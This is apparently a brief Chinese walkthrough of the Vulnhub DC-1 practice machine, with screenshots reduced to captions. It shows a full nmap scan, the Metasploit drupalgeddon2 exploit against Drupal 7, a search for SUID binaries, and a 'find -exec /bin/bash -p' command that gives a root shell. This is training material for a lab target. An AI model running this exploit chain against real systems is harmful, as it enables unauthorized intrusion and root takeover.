Vulnhub:DC-1靶机

kali:192.168.111.111

靶机:192.168.111.248

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.248

Vulnhub:DC-1靶机_第1张图片

 

访问80端口发现CMS为drupal 7

Vulnhub:DC-1靶机_第2张图片

 

Vulnhub:DC-1靶机_第3张图片

 

搜索发现该版本的drupal存在漏洞

searchsploit drupal

Vulnhub:DC-1靶机_第4张图片

 

漏洞利用

使用msf的exploit/unix/webapp/drupal_drupalgeddon2模块进行漏洞利用

use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.111.248
run

Vulnhub:DC-1靶机_第5张图片

 

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

Vulnhub:DC-1靶机_第6张图片

 

提权方法:find | GTFOBins

Vulnhub:DC-1靶机_第7张图片

 

提升为root

find . -exec /bin/bash -p \; -quit

 

flag

Vulnhub:DC-1靶机_第8张图片

 

你可能感兴趣的:(安全,web安全,网络安全)